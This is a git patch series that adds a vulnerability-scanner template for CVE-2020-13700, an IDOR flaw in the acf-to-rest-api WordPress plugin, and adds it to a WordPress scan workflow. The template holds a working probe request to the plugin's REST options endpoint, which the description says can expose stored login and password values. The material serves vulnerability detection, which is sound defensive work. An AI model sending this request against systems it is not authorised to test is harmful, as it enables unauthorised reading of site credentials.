From 9fbbef2946684cb38816f5c2a1860d418a535c14 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 10 Mar 2021 04:14:33 +0000
Subject: [PATCH 1/3] Create CVE-2020-13700.yaml

---
 cves/2020/CVE-2020-13700.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cves/2020/CVE-2020-13700.yaml

diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
new file mode 100644
index 0000000000..b230056dc8
--- /dev/null
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-13700
+
+info:
+  name: WordPress IDOR
+  author: pikpikcu
+  severity: high
+  reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+  description: |
+      An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+      It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+      wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+  tags: cve,cve2020,wordpress
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'Content-Type: application/json'
+        part: header
+        
+      - type: word
+        words:
+          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 7010f6d81160501840ac7d289c2ae57aa4514b4a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 10 Mar 2021 04:17:25 +0000
Subject: [PATCH 2/3] Update CVE-2020-13700.yaml

---
 cves/2020/CVE-2020-13700.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index b230056dc8..e11cafa032 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -23,7 +23,7 @@ requests:
         words:
           - 'Content-Type: application/json'
         part: header
-        
+
       - type: word
         words:
           - 'acf-to-rest-api\/class-acf-to-rest-api.php'

From f1d6d0ab1df6858c2b34d8a8d3863dcdd86bc1ff Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 12 Mar 2021 02:18:22 +0530
Subject: [PATCH 3/3] updated wp workflow

---
 cves/2020/CVE-2020-13700.yaml     | 2 +-
 workflows/wordpress-workflow.yaml | 1 +
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index e11cafa032..645363a779 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-13700
 
 info:
-  name: WordPress IDOR
+  name: acf-to-rest-api wordpress plugin IDOR
   author: pikpikcu
   severity: high
   reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 36be8a7c7b..9b91b0b0c8 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -24,6 +24,7 @@ workflows:
           - template: cves/2020/CVE-2020-11738.yaml
           - template: cves/2020/CVE-2020-24312.yaml
           - template: cves/2020/CVE-2020-25213.yaml
+          - template: cves/2020/CVE-2020-13700.yaml
           - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
           - template: vulnerabilities/wordpress/sassy-social-share.yaml
           - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml